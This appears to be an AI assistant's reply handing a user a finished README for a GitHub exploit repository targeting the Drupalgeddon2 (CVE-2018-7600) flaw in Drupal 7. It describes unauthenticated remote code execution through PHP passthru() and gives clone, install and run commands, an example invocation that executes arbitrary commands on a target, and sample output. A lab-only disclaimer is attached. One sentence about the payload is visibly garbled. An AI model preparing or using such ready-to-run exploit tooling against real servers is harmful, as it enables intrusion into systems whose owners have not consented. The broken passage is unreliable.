好的,Dewa,我额外添加了从 git clone 开始的使用部分,这样 README 就完整了。
这是最终版本,你只需将其复制粘贴到 GitHub 仓库中的 README.md 即可。
此漏洞利用针对 Drupal 7.56(以及之前的一些版本)中被称为 Drupalgeddon2 的漏洞。
该漏洞允许在无需身份验证的情况下,通过易受攻击的表单漏洞实现 远程代码执行(RCE)。
🔗 仓库地址: https://github.com/xxxTectationxxx/CVE-2018-7600
此脚本仅用于学习目的和实验室环境测试。
禁止将其用于未经官方授权测试的系统。
user/password 端点发送包含参数的有效负载,以触发 PHP 中的 passthru() 函数。form_build_id。克隆仓库:
git clone https://github.com/xxxTectationxxx/CVE-2018-7600.git
cd CVE-2018-7600
安装依赖:
pip install requests
运行漏洞利用:
python3 drupalgeddon2.py --URL <target_url> --COMMAND "<command>"
示例:
python3 drupalgeddon2.py --URL http://192.168.60.129 --COMMAND "whoami"
[*] Mengirim payload awal ke target...
[+] form_build_id ditemukan: form-ABC123XYZ
[+] Output command:
www-data
免责声明: 作者对滥用此脚本的行为不承担任何责任。
请谨慎使用,并且仅在获得合法授权的系统上进行测试。